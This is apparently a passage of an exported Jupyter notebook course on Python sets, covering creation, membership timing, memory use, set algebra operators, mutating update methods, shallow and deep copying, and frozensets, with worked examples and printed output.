s1 = {1, 2, 3, 4}
s2 = {1, 2, 3}
s1 - s2

{4}

Tip: to get the union of two (or more) sets you can use the `|` operator:

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s1 | s2

{1, 2, 3, 4}

Tip: to get the intersection of two (or more) sets you can use the `&` operator:

In [5]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s1 & s2

{2, 3}

Hint: It might be helpful to draw out a set diagram and consider what subset you are trying to isolate.

##### Solution

The approach I am going to take here is to merge all the keys into a single set, then remove from it the intersection of all the keys (i.e. remove keys that are common to all dictionaries).
Once I have that set of keys, I will pull the frequency from each dictionary (node) and build up a list of these frequencies.

In [6]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

In [7]:
union = n1.keys() | n2.keys() | n3.keys()
intersection = n1.keys() & n2.keys() & n3.keys()

In [8]:
union, intersection, union - intersection

({'employee', 'employees', 'login', 'user', 'users'},
 {'employees', 'users'},
 {'employee', 'login', 'user'})

In [9]:
def identify(node1, node2, node3):
    union = node1.keys() | node2.keys() | node3.keys()
    intersection = node1.keys() & node2.keys() & node3.keys()
    relevant = union - intersection
    result = {key: (node1.get(key, 0),
                    node2.get(key, 0),
                    node3.get(key, 0))
              for key in relevant}
    return result        

In [10]:
result = identify(n1, n2, n3)
for k, v in result.items():
    print(f'{k}: {v}')

login: (0, 0, 1000)
user: (100, 230, 0)
employee: (5000, 0, 0)


# Section 05 - Sets

##  Creating Sets

Just like dictionaries, there is a variety of ways to create sets.

First we have set literals:

In [1]:
s = {'a', 100, (1,2)}

In [2]:
type(s)

set

To create an empty set we cannot use `{}` since that would create an empty dictionary:

In [3]:
d = {}
type(d)

dict

Instead, we have to use the `set()` function:

In [4]:
s = set()

In [5]:
type(s)

set

This brings up the second way we can create sets. We can use the `set()` function and pass it an iterable:

In [6]:
s = set([1, 2, 3])

In [7]:
s

{1, 2, 3}

or even:

In [8]:
s = set(range(10))

In [9]:
s

{0, 1, 2, 3, 4, 5, 6, 7, 8, 9}

Of course we are restricted to an iterable of hashable elements only.

So this would not work:

In [10]:
s = set([[1,2], [3,4]])

TypeError: unhashable type: 'list'

What might surprise you is this:

In [11]:
d = {'a': 1, 'b': 2}
s = set(d)

See? No exception!

But consider what happens when we iterate a dictionary:

In [12]:
for e in d:
    print(e)

a
b


We just get the keys back! All dictionary keys are hashable, and therefore we can always create a set from a dictionary, but it will just contain the keys:

In [13]:
s

{'a', 'b'}

Next we can use a **set comprehension** to create a set. It looks and works almost the same as a dictionary comprehension - but a set, unlike a dictionary, has no associated values. 
Here's an example:

In [14]:
s = {c for c in 'python'}

In [15]:
s

{'h', 'n', 'o', 'p', 't', 'y'}

Of course, we do not really need to use a comprehension here. Since strings are iterables of characters (which are hashable), we can create a set from the characters in a string as follows:

In [16]:
s = set('python')
s

{'h', 'n', 'o', 'p', 't', 'y'}

Just like we have iterable unpacking and dictionary unpacking, we also have set unpacking:

In [17]:
s1 = {'a', 'b', 'c'}
s2 = {10, 20, 30}

To combine both elements of these sets, we cannot do this:

In [18]:
s = {s1, s2}

TypeError: unhashable type: 'set'

This would be a set of sets - and sets are not hashable anyway (we could use a frozenset, but more about those later).

What we want is to unpack the elements of the sets into something else.

We could create a set containing all these elements:

In [19]:
s = {*s1, *s2}

In [20]:
s

{10, 20, 30, 'a', 'b', 'c'}

What's interesting about the unpacking though, is that we are not restricted to just creating another set:

In [21]:
l = [*s1, *s2]

In [22]:
l

['b', 'a', 'c', 10, 20, 30]

or even to pass as arguments to a function - with a big caveat!

In [23]:
def my_func(a, b, c):
    print(a, b, c)

In [24]:
args = {20, 10, 30}

We cannot just pass the set directly to `my_func` because it expects three arguments, but we can unpack the set before we pass it:

In [25]:
my_func(*args)

10 20 30


Notice the order of the arguments! As we know, order of elements in a set is considered random (it's not of course, but for all practical purposes it might as well be).

In some cases however, it might not matter.
Consider this function:

In [26]:
def averager(*args):
    total = 0
    for arg in args:
        total += arg
    return total / len(args)

In [27]:
averager(10, 20, 30)

20.0

#### Distinct Elements

We know that set elements must be distinct - so how do all these methods we have seen for creating sets behave when we have repeated elements?

Let's take a look at each, one at a time:

In [28]:
s = {'a', 'b', 'c', 'a', 'b', 'c'}
s

{'a', 'b', 'c'}

As you can see, Python just discards any repeated element.

The same happens with the `set()` function:

In [29]:
s = set('baabaa')
s

{'a', 'b'}

And the same with a comprehension:

In [30]:
s = {c for c in 'moomoo'}
s

{'m', 'o'}

Now unpacking is a little different. If we unpack into a set, then sure, elements will remain distinct:

In [31]:
s1 = {10, 20, 30}
s2 = {20, 30, 40}
s = {*s1, *s2}
s

{10, 20, 30, 40}

But if we unpack into a tuple for example:

In [32]:
t = (*s1, *s2)

In [33]:
t

(10, 20, 30, 40, 20, 30)

As you can see, we get repeated elements.

#### Application

So, one really interesting application of sets and the fact that their elements are unique, is finding unique elements from collections whose elements might not be.

Consider this problem. We have a string, and we want to assign a score to the string based on how many distinct characters of the alphabet it uses.

(I'm considering an alphabet here to be 'a' - 'z'). So the total length of that alphabet is 26, and we can score a string this way:

In [34]:
s = 'abcdefghijklmnopqrstuvwxyz'
distinct = set(s)
score = len(s) / 26
score

1.0

Let's write a function to do this, (and remove any characters that are not part of our 'alphabet'):

In [35]:
def scorer(s):
    alphabet = set('abcdefghijklmnopqrstuvwxyz')
    s = s.lower()
    distinct = set(s)
    # we want to only count characters that are in our alphabet
    effective = distinct & alphabet
    return len(effective) / len(alphabet)

In [36]:
scorer(s)

1.0

In [37]:
scorer('baa baa')

0.07692307692307693

In [38]:
2 / 26

0.07692307692307693

In [39]:
scorer('baa baa baa!!! 123')

0.07692307692307693

In [40]:
scorer('the quick brown fox jumps over the lazy dog')

1.0

Often we are presented with problems where we have a list, or other collection, and we just want to find the unique elements of that list.
As long as the elements are all hashable, we can easily do this using sets!

##  Common Set Operations

Let's look at some of the more basic and common operations with sets:
* size
* membership testing
* adding elements
* removing elements

#### Size

The size of a set (it's cardinality), is given by the `len()` function - the same one we use for sequences, iterables, dictionaries, etc.

In [1]:
s = {1, 2, 3}
len(s)

3

#### Membership Testing

This is also very easy:

In [2]:
s = {1, 2, 3}

In [3]:
1 in s

True

In [4]:
10 in s

False

In [5]:
1 not in s

False

In [6]:
10 not in s

True

But let's go a little further and consider how membership testing works with sets. As I mentioned in earlier lectures, sets are hash tables, and membership testing is **extremely** efficient for sets, since it's simply a hash table lookup - as opposed to scanning a list for example, until we find the requested element (or not).

Let's do some quick timings to verify this, as well as compare lookup speeds for sets and dictionaries as well (which are also, after all, hash tables).

In [7]:
from timeit import timeit

In [8]:
n = 100_000
s = {i for i in range(n)}
l = [i for i in range(n)]
d = {i:None for i in range(n)}

Let's time how long it takes to find if `9` is in the object - which would be the tenth element only of the list and the dictionary (keys), and who knows for the set:

In [9]:
number = 1_000_000
search = 9
t_list = timeit(f'{search} in l', globals=globals(), number=number)
t_set = timeit(f'{search} in s', globals=globals(), number=number)
t_dict = timeit(f'{search} in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 0.09865150199038908
set: 0.025414875999558717
dict: 0.029280081973411143


The story changes even more if we test for example the last element of the list.
I'm definitely not to run the tests `1_000_000` times - not unless we want to make this video reaaaaaaly long!

In [10]:
number = 3_000
search = 99_999
t_list = timeit(f'{search} in l', globals=globals(), number=number)
t_set = timeit(f'{search} in s', globals=globals(), number=number)
t_dict = timeit(f'{search} in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 2.287420156993903
set: 9.811401832848787e-05
dict: 0.00010706903412938118


The situation for `not in` is the same:

In [11]:
number = 3_000
search = -1
t_list = timeit(f'{search} not in l', globals=globals(), number=number)
t_set = timeit(f'{search} not in s', globals=globals(), number=number)
t_dict = timeit(f'{search} not in d', globals=globals(), number=number)
print('list:', t_list)
print('set:', t_set)
print('dict:', t_dict)

list: 2.031598252011463
set: 7.687101606279612e-05
dict: 7.940799696370959e-05


But this efficiency does come at the cost of memory:

In [12]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

5242952
4194504
824440


Even for empty objects:

In [13]:
s = set()
d = dict()
l = list()

In [14]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

216
200
40


And adding just one element to each object:

In [15]:
s.add(10)
d[10] =None
l.append(10)

In [16]:
print(d.__sizeof__())
print(s.__sizeof__())
print(l.__sizeof__())

216
200
72


If you're wondering why the dictionary and set size did not increase, remember when we covered hash tables - there is some overallocation that takes place so we don't incure the cost of resizing every time we had an element. In fact, lists do the same as well - they over-allocate to reduce the resizing cost. I'll come back to that in a minute.

#### Adding Elements

When we have an existing set, we can always add elements to it. Of course *where* it gets "inserted" is unknown. So Python does not call it `append` or `insert` which would connotate ordering of some kind - instead it just calls it `add`:

In [17]:
s = {30, 20, 10}

In [18]:
s.add(15)

In [19]:
s

{10, 15, 20, 30}

Don't be fooled by the apparent ordering of the elements here. This is the same as with dictionaries - Jupyter tries to represent things nicely for us, but underneath the scenes:

In [20]:
print(s)

{10, 20, 30, 15}


In [21]:
s.add(-1)
print(s)

{10, 15, 20, 30, -1}


And the order just changed again! :-)

What's interesting about the `add()` method, is that if we try to add an element that already exists, Python will simply ignore it:

In [22]:
s

{-1, 10, 15, 20, 30}

In [23]:
s.add(15)

In [24]:
s

{-1, 10, 15, 20, 30}

Now that we know how to add an element to a set, let's go back and see how  the set, dictionary and list resize as we add more elements to them.
We should expect the list to be more efficient from a memory standpoint:

In [25]:
l = list()
s = set()
d = dict()

print('#', 'dict', 'set', 'list')
for i in range(50):
    print(i, d.__sizeof__(), s.__sizeof__(), l.__sizeof__())
    l.append(i)
    s.add(i)
    d[i] = None

# dict set list
0 216 200 40
1 216 200 72
2 216 200 72
3 216 200 72
4 216 200 72
5 216 712 104
6 344 712 104
7 344 712 104
8 344 712 104
9 344 712 168
10 344 712 168
11 624 712 168
12 624 712 168
13 624 712 168
14 624 712 168
15 624 712 168
16 624 712 168
17 624 712 240
18 624 712 240
19 624 712 240
20 624 712 240
21 624 2248 240
22 1160 2248 240
23 1160 2248 240
24 1160 2248 240
25 1160 2248 240
26 1160 2248 320
27 1160 2248 320
28 1160 2248 320
29 1160 2248 320
30 1160 2248 320
31 1160 2248 320
32 1160 2248 320
33 1160 2248 320
34 1160 2248 320
35 1160 2248 320
36 1160 2248 408
37 1160 2248 408
38 1160 2248 408
39 1160 2248 408
40 1160 2248 408
41 1160 2248 408
42 1160 2248 408
43 2256 2248 408
44 2256 2248 408
45 2256 2248 408
46 2256 2248 408
47 2256 2248 504
48 2256 2248 504
49 2256 2248 504


As you can see, the memory costs for a set or a dict are definitely higher than for a list. You can also see from this how it looks like CPython implements different resizing strategies for sets, dicts and lists.
The strategy by the way has nothing to do with the size of the elements we put in those objects:

In [26]:
l = list()
s = set()
d = dict()

print('#', 'dict', 'set', 'list')
for i in range(50):
    print(i, d.__sizeof__(), s.__sizeof__(), l.__sizeof__())
    l.append(i**1000)
    s.add(i*1000)
    d[i*1000] = None

# dict set list
0 216 200 40
1 216 200 72
2 216 200 72
3 216 200 72
4 216 200 72
5 216 712 104
6 344 712 104
7 344 712 104
8 344 712 104
9 344 712 168
10 344 712 168
11 624 712 168
12 624 712 168
13 624 712 168
14 624 712 168
15 624 712 168
16 624 712 168
17 624 712 240
18 624 712 240
19 624 712 240
20 624 712 240
21 624 2248 240
22 1160 2248 240
23 1160 2248 240
24 1160 2248 240
25 1160 2248 240
26 1160 2248 320
27 1160 2248 320
28 1160 2248 320
29 1160 2248 320
30 1160 2248 320
31 1160 2248 320
32 1160 2248 320
33 1160 2248 320
34 1160 2248 320
35 1160 2248 320
36 1160 2248 408
37 1160 2248 408
38 1160 2248 408
39 1160 2248 408
40 1160 2248 408
41 1160 2248 408
42 1160 2248 408
43 2256 2248 408
44 2256 2248 408
45 2256 2248 408
46 2256 2248 408
47 2256 2248 504
48 2256 2248 504
49 2256 2248 504


As you can see the memory cost of the objects themselves did not change, nor did the sizing strategy (remember that all those objects contain pointers to the data, not the data itself - and a pointer to an object, no matter the size of that object, is the same).
So be careful using `__sizeof__` - it's often only part of the story.

#### Removing Elements

Now let's see how we can remove elements from a set.

Just as with dictionaries, we may be trying to remove an item that does not exist in the set. Depending on whether we want to silently ignore deletion of non-existent elements we can use one of two techniques:

In [27]:
s = {1, 2, 3}

In [28]:
s.remove(1)

In [29]:
s

{2, 3}

In [30]:
s.remove(10)

KeyError: 10

As you can see, we get an exception.

If we don't want the exception we can do it this way:

In [31]:
s.discard(10)

In [32]:
s

{2, 3}

We can also remove (and return) an **arbitrary** element from the set:

In [33]:
s = set('python')

In [34]:
s

{'h', 'n', 'o', 'p', 't', 'y'}

In [35]:
s.pop()

'h'

Note that we **do not know** ahead of time what element will get popped.

Also, popping an empty set will result in a `KeyError` exception:

In [36]:
s = set()
s.pop()

KeyError: 'pop from an empty set'

Something like that might be handy to handle all the elements of a set one at a time without caring for the order in which elements are removed from the set - not that you can, anyway - sets are not ordered!
But this way you can get at the elements of a set without knowing the content of the set (since you need to know the element you are removing with `remove` and `discard`.)

Finally, you can empty out a set by calling the `clear` method:

In [37]:
s = {1, 2, 3}
s.clear()
s

set()

##  Set Operations

Let's go over the set operations that are available in Python.

##### Intersections

There's two ways to calculate the intersection of sets:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}

In [2]:
s1.intersection(s2)

{2, 3}

In [3]:
s1 & s2

{2, 3}

We can computer the intersection of more than just two sets at a time:

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s3 = {3, 4, 5}

In [5]:
s1.intersection(s2, s3)

{3}

In [6]:
s1 & s2 & s3

{3}

##### Unions

There's also two ways to calculate the union of two sets:

In [7]:
s1 = {1, 2, 3}
s2 = {3, 4, 5}

In [8]:
s1.union(s2)

{1, 2, 3, 4, 5}

In [9]:
s1 | s2

{1, 2, 3, 4, 5}

We can compute the union of more than two sets:

In [10]:
s3 = {5, 6, 7}

In [11]:
s1.union(s2, s3)

{1, 2, 3, 4, 5, 6, 7}

In [12]:
s1 | s2 | s3

{1, 2, 3, 4, 5, 6, 7}

##### Disjointedness

Two sets are disjoint if their intersection is empty:

In [13]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s3 = {30, 40, 50}

In [14]:
print(s1.isdisjoint(s2))
print(s2.isdisjoint(s3))

False
True


Of course we could use the cardinality of the intersection instead:

In [15]:
len(s1 & s2)

2

In [16]:
len(s2 & s3)

0

Or, since empty sets are falsy:

In [17]:
bool(set())

False

In [18]:
bool({0})

True

we can also use the associated truth value:

In [19]:
if {1, 2} & {2, 3}:
    print('sets are not disjoint')

sets are not disjoint


In [20]:
if not {1, 2} & {3, 4}:
    print('sets are disjoint')

sets are disjoint


##### Differences

The difference of two sets can also be computed in two different ways:

In [21]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5}

In [22]:
s1 - s2

{1, 2, 3}

In [23]:
s1.difference(s2)

{1, 2, 3}

Of course, with the method we can use iterables as well:

In [24]:
s1.difference([4, 5])

{1, 2, 3}

Note that the difference operator is not commutative, i.e. it does not hold in general that
```
s1 - s2 = s2 - s1
```

In [25]:
s2 - s1

set()

##### Symmetric Difference

We can calculate the symmetirc difference of two sets also in two ways:

In [26]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7, 8}

In [27]:
s1.symmetric_difference(s2)

{1, 2, 3, 6, 7, 8}

In [28]:
s1 ^ s2

{1, 2, 3, 6, 7, 8}

Remember that the symmetric difference of two sets results in the difference of the union and the intersection of the two sets:

In [29]:
(s1 | s2) - (s1 & s2)

{1, 2, 3, 6, 7, 8}

##### Subsets and Supersets

With containmnent we have the notion of proper containment (i.e strictly contained, not equal) and just containment (contained, possibly equal).
This is analogous to the concept of (`i < j` and `i <= j`)

In [30]:
s1 = {1, 2, 3}
s2 = {1, 2, 3}
s3 = {1, 2, 3, 4}
s4 = {10, 20, 30}

In [31]:
s1.issubset(s2)

True

In [32]:
s1 <= s2

True

For strict containment there is no set method - we have to use the operator, or a combination of methods/operators:

In [33]:
s1 < s2

False

In [34]:
s1.issubset(s2) and s1 != s2

False

In [35]:
s1 < s3

True

In [36]:
s1 <= s4

False

An analogous situation with supersets:

In [37]:
s2.issuperset(s1)

True

In [38]:
s2 >= s1

True

In [39]:
s2 > s1

False

Be careful with these set containment operators, they do not work quite the same way as with numbers for example:

With numbers, if
```
a <= b --> False
```
then it follows that
```
a < b --> True
```

This is not the case with set containment:

In [40]:
s1 = {1, 2, 3}
s2 = {10, 20, 30}

As you can see these two sets are non-empty and disjoint, and containment works as follows:

In [41]:
s1 <= s2

False

In [42]:
s1 > s2

False

In [43]:
s1 < s2

False

In [44]:
s1 >= s2

False

In [45]:
s1 == s2

False

There's really not a whole lot more to say about the various set operations themselves - they are quite easy.
Where they really shine is in their application to diverse problems, especially when dealing with dictionary keys as we saw earlier.

##### Enhanced Set Methods

There's a slight wrinkle to some of these operations we just saw.

When we use the operators (`&`, `|`, `-`) we have to deal with sets on both sides of the operator:

In [46]:
{1, 2} & [2, 3]

TypeError: unsupported operand type(s) for &: 'set' and 'list'

But when we work with the method equivalent, we do not have that restriction - in fact the argument to these methods can be an iterable in general, not just a set:

In [47]:
{1, 2}.intersection([2, 3])

{2}

What happens is that Python implicitly converts any iterable to a set then finds the intersection.

However, these iterables must contain hashable elements - they need not be unique (they will eventually be made to consist of unique elements):

In [48]:
{1, 2}.intersection([[1,2]])

TypeError: unhashable type: 'list'

This means that when we want to find the intersection of two `lists` for example, we could proceed this way:

In [49]:
l1 = [1, 2, 3]
l2 = [2, 3, 4]

In [50]:
set(l1).intersection(l2)

{2, 3}

##### Side Note: Why the choice of `&`, `|` , `^` for unions, intersections and symmetric differences?

You might be wondering why Python chose those particular symbols.

Python also uses these operators for bitwise manipulation.

`&` and `|` seem like a perfectly natural fit when you consider that
```
s1 & s2
```
means the elements that belong to `s1` **and** `s2`, 

and
```
s1 | s2
```
means the elements that belong to `s1` **or** `s2`.

Let's look at the bitwise operations:

Let's look at these two integers:

In [51]:
a = 0b101010
b = 0b110100

In [52]:
a, b

(42, 52)

And these are just two integers, we just chose to create them using a binary literal:

In [53]:
type(a), type(b)

(int, int)

Now consider that `1` means `True`, and `0` means `False`:
* `1 and 0` or `1 & 0` --> `0`
* `1 or 0` or `1 | 0` --> `1`
* and so on

Let's use the bitwise Python and (`&`) operator on those two numbers:

In [54]:
c = a & b
print(c)

32


What we really need to do is look at the representation of this result:

In [55]:
bin(c)

'0b100000'

So this is the result:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
1 0 0 0 0 0
```

As you can see we performed a bitwise `and` between the two values. Very similar to asking whether `1` is in the intersection of corresponding slots.

The same happens with `|`, the bitwise `or` operator and unions:

In [56]:
c = a | b

In [57]:
bin(c)

'0b111110'

And again, looking at the bits themselves:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
1 1 1 1 1 0
```

this is like asking whether `1` is in the union of corresponding slots

Now for the symmetric difference.
There is another boolean algebra operation called `xor`, denoted by `^`.
This one works this way:
```
x xor y --> True if x is True or y is True, but not both
```


In [58]:
print(bin(a))
print(bin(b))
print(bin(a^b))

0b101010
0b110100
0b11110


Let's see the bits again:
```
1 0 1 0 1 0
1 1 0 1 0 0
-----------
0 1 1 1 1 1
```

If we make two corresponding slots into sets and find the symmetric difference between the two, what do we get?

In [59]:
{1} ^ {1}

set()

In [60]:
{0} ^ {1}

{0, 1}

In [61]:
{0} ^ {0}

set()

So we can ask if `1` is in `{0} ^ {1}` - which is exactly what the bitwise `xor` (`^`) operator evaluates to in the above example.

##  Update Operations

We can't really update an element of a set - either we remove one or add one - but replacement would not make sense, much like "replacing" a key in a dictionary (we can replace a value, just not a key, and sets are basically like value-less dictionaries).

Let's first consider how we can create new sets from other sets:

* intersection
* union
* difference
* symetric difference

For each of these cases, we can create new sets as follows:

In [1]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(s1, id(s1))
s1 = s1 & s2
print(s1, id(s1))

{1, 2, 3} 4526218152
{2, 3} 4526218376


As you can see, we calculated the intersection of `s1` and `s2` and set `s1` to the result - but this means we ended up with a new object for `s1`.

We may want to **mutate** `s1` instead.
And the samew goes for the other operations mentioned above.

Python provides us a way to do this using both methods and equivalent operators:

* union updates: `s1.update(s2)` or `s1 |= s2`
* intersection updates: `s1.intersection_update(s2)` or `s1 &= s2`
* difference updates: `s1.difference_update(s2)` or `s1 -= s2`
* symm. diff. updates: `s1.symmetric_difference_update(s2)` or `s1 ^= s2`

All these operations **mutate** the original set.

#### Union Updates

In [2]:
s1 = {1, 2, 3}
s2 = {4, 5, 6}
print(id(s1))
s1 |= s2
print(s1, id(s1))

4522075080
{1, 2, 3, 4, 5, 6} 4522075080


In [3]:
s1 = {1, 2, 3}
s2 = {4, 5, 6}
print(id(s1))
s1.update(s2)
print(s1, id(s1))

4526218152
{1, 2, 3, 4, 5, 6} 4526218152


#### Intersection Updates

In [4]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(id(s1))
s1 &= s2
print(s1, id(s1))

4522075080
{2, 3} 4522075080


In [5]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
print(id(s1))
s1.intersection_update(s2)
print(s1, id(s1))

4526218152
{2, 3} 4526218152


#### Difference Updates

In [6]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
print(id(s1))
s1 -= s2
print(s1, id(s1))

4526218376
{1, 4} 4526218376


In [7]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
print(id(s1))
s1.difference_update(s2)
print(s1, id(s1))

4522074856
{1, 4} 4522074856


Be careful with this one. These two expressions are **NOT** equivalent (this is because difference operations are not associative):

In [8]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s3 = {3, 4}
result = s1 - (s2 - s3)
print(result)
s1 -= s2 - s3
print(s1)

{1, 3, 4}
{1, 3, 4}


In [9]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s3 = {3, 4}
result = (s1 - s2) - s3
print(result)
s1.difference_update(s2, s3)
print(s1)

{1}
{1}


#### Symmetric Difference Update

In [10]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
s1 ^ s2

{1, 2, 3, 6, 7}

In [11]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
print(id(s1))
s1 ^= s2
print(s1, id(s1))

4526217704
{1, 2, 3, 6, 7} 4526217704


In [12]:
s1 = {1, 2, 3, 4, 5}
s2 = {4, 5, 6, 7}
print(id(s1))
s1.symmetric_difference_update(s2)
print(s1, id(s1))

4526218824
{1, 2, 3, 6, 7} 4526218824


#### Why the methods as well as the operators?

The methods are actually a bit more flexible than the operators.
What happens when we want to update a set from it's union with multiple other sets?
We can certainly do it this way:

In [13]:
s1 = {1, 2, 3}
s2 = {3, 4, 5}
s3 = {5, 6, 7}

In [14]:
print(id(s1))
s1 |= s2 | s3
print(s1, id(s1))

4522074856
{1, 2, 3, 4, 5, 6, 7} 4522074856


So this works quite well, but we **have** to use sets.

Using the method we do not have that restriction, we can actually use iterables (they must contain hashable elements) and Python will implicitly convert them to sets:

In [15]:
s1 = {1, 2, 3}
s1.update([3, 4, 5], (6, 7, 8), 'abc')
print(s1)

{1, 2, 3, 4, 5, 6, 7, 8, 'a', 'b', 'c'}


Of course we can achieve the same thing using the operators, it just requires a little more typing:

In [16]:
s1 = {1, 2, 3}
s1 |= set([3, 4, 5]) | set((6, 7, 8)) | set('abc')
print(s1)

{1, 2, 3, 4, 5, 6, 7, 8, 'a', 'b', 'c'}


#### Where might this be useful?

You're hopefully seeing a parallel between these set mutation operations and list mutation operations such as `append` and `extend`.

So the usefullness of mutating a set is no different than the usefullness of mutating a list.

There might be a reason you want to maintain the same object reference - maybe you are writing a function that needs to mutate some set that was passed as an argument.

##### Example 1

Suppose you are writing a function that needs to return all the words found in multiple strings, but with certain words removed (like `'the'`, `'and'`, etc).

You could take this approach:

In [17]:
def combine(string, target):
    target.update(string.split(' '))

In [18]:
def cleanup(combined):
    words = {'the', 'and', 'a', 'or', 'is', 'of'}
    combined -= words

In [19]:
result = set()
combine('lumberjacks sleep all night', result)
combine('the mistry of silly walks', result)
combine('this parrot is a late parrot', result)
cleanup(result)
print(result)

{'parrot', 'this', 'walks', 'mistry', 'late', 'lumberjacks', 'night', 'silly', 'sleep', 'all'}


##### Example 2

You may find the above example a little contrived, so let's see another example which might actually prove more practical.

Suppose we have a program that fetches data from some API, database, whatever - and it retrieves a paged list of city names. We want our program to keep fetching data from the source until the source is exhausted, and filter out any cities we are not interested in from our final result.

To simulate the data source, let's do this:

In [20]:
def gen_read_data():
    yield ['Paris', 'Beijing', 'New York', 'London', 'Madrid', 'Mumbai']
    yield ['Hyderabad', 'New York', 'Milan', 'Phoenix', 'Berlin', 'Cairo']
    yield ['Stockholm', 'Cairo', 'Paris', 'Barcelona', 'San Francisco']

And we can use this generator this way:

In [21]:
data = gen_read_data()

In [22]:
next(data)

['Paris', 'Beijing', 'New York', 'London', 'Madrid', 'Mumbai']

In [23]:
next(data)

['Hyderabad', 'New York', 'Milan', 'Phoenix', 'Berlin', 'Cairo']

In [24]:
next(data)

['Stockholm', 'Cairo', 'Paris', 'Barcelona', 'San Francisco']

In [25]:
next(data)

StopIteration: 

Next we're going to create a filter that will look at the data just received, removing any cities that match one we want to ignore:

In [26]:
def filter_incoming(*cities, data_set):
    data_set.difference_update(cities)

In [27]:
result = set()
data = gen_read_data()
for page in data:
    result.update(page)
    filter_incoming('Paris', 'London', data_set=result)
print(result)

{'Hyderabad', 'New York', 'Phoenix', 'San Francisco', 'Barcelona', 'Mumbai', 'Stockholm', 'Cairo', 'Madrid', 'Milan', 'Beijing', 'Berlin'}


##  Copying Sets

Just as with other container types, we need to differentiate between shallow copies and deep copies.

Python sets implement a `copy` method that creates a shallow copy of the set. And, just as with lists, tuples, dictionaries, etc, we can also use unpacking to shallow copy sets. We can also just use the `set()` function to shallow copy one set into another.

Deep copies of sets can be done using the `deepcopy` function in the `copy` module.

The concepts and techniques are not new, so I won't spend much time on them.

#### Shallow Copies using the `copy` method

To illustrate the shallow copy vs deepcopy issues, we'll create our own mutable, but hashable type:

In [1]:
class Person:
    def __init__(self, name):
        self.name = name
    
    def __repr__(self):
        return f'Person(name={self.name})'

In [2]:
p1 = Person('John')
p2 = Person('Eric')

In [3]:
s1 = {p1, p2}

In [4]:
s1

{Person(name=Eric), Person(name=John)}

Now let's make a shallow copy:

In [5]:
s2 = s1.copy()

In [6]:
s1 is s2

False

As we can see the sets are not the same, however their contained elements **are**:

In [7]:
p1.name = 'John Cleese'

In [8]:
s1

{Person(name=Eric), Person(name=John Cleese)}

In [9]:
s2

{Person(name=Eric), Person(name=John Cleese)}

#### Shallow copies using unpacking

We can use unpacking, similar to iterable unpacking to unpack one set into another:

In [10]:
s3 = {*s2}

In [11]:
s3 is s2

False

In [12]:
s3

{Person(name=Eric), Person(name=John Cleese)}

In [13]:
p2.name = 'Eric Idle'

In [14]:
print(s1)
print(s2)
print(s3)

{Person(name=John Cleese), Person(name=Eric Idle)}
{Person(name=John Cleese), Person(name=Eric Idle)}
{Person(name=John Cleese), Person(name=Eric Idle)}


#### Shallow copies using the `set()` function

In [15]:
s4 = set(s1)

In [16]:
s4 is s1

False

In [17]:
s4

{Person(name=Eric Idle), Person(name=John Cleese)}

In [18]:
p1.name = 'Michael Palin'

In [19]:
print(s1)
print(s2)
print(s3)
print(s4)

{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}
{Person(name=Michael Palin), Person(name=Eric Idle)}


#### Deep Copies

In [20]:
from copy import deepcopy

In [21]:
s5 = deepcopy(s1)

In [22]:
s1 is s5

False

In [23]:
s1

{Person(name=Eric Idle), Person(name=Michael Palin)}

In [24]:
s5

{Person(name=Eric Idle), Person(name=Michael Palin)}

In [25]:
p1.name = 'Terry Jones'

In [26]:
print(s1)
print(s2)
print(s3)
print(s4)
print(s5)

{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Terry Jones), Person(name=Eric Idle)}
{Person(name=Eric Idle), Person(name=Michael Palin)}


As you can see, the deep copy also made (deep) copies of each element in the set being (deep) copied.

##  Frozen Sets

`frozenset` is the **immutable** equivalent of the plain `set`.

Apart from the fact that you cannot mutate the collection (i.e. add or remove elements), the interesting thing is that frozen sets are hashable (as long as each contained element is also hashable).

This means that whereas we cannot create a set of sets, we can create a set of frozen sets (or a frozen set of frozen sets). It also means that we can use frozen sets as dictionary keys.

There is no literal for frozen sets - we have to use the `frozenset()` callable. It is used the same way to create frozensets that `set()` would be used to create sets.

In [1]:
s1 = {'a', 'b', 'c'}

In [2]:
hash(s1)

TypeError: unhashable type: 'set'

In [3]:
s2 = frozenset(['a', 'b', 'c'])

In [4]:
hash(s2)

-2484440409846998240

And we can create a set of frozen sets:

In [5]:
s3 = {frozenset({'a', 'b'}), frozenset([1, 2, 3])}

In [6]:
s3

{frozenset({1, 2, 3}), frozenset({'a', 'b'})}

#### Copying Frozen Sets

Remember what happens when we create a shallow copy of a tuple using the `tuple()` callable?

In [7]:
t1 = (1, 2, [3, 4])

In [8]:
t2 = tuple(t1)

In [9]:
t1 is t2

True

This is quite different from what happens with a list:

In [10]:
l1 = [1, 2, [3, 4]]
l2 = list(l1)

In [11]:
l1 is l2

False

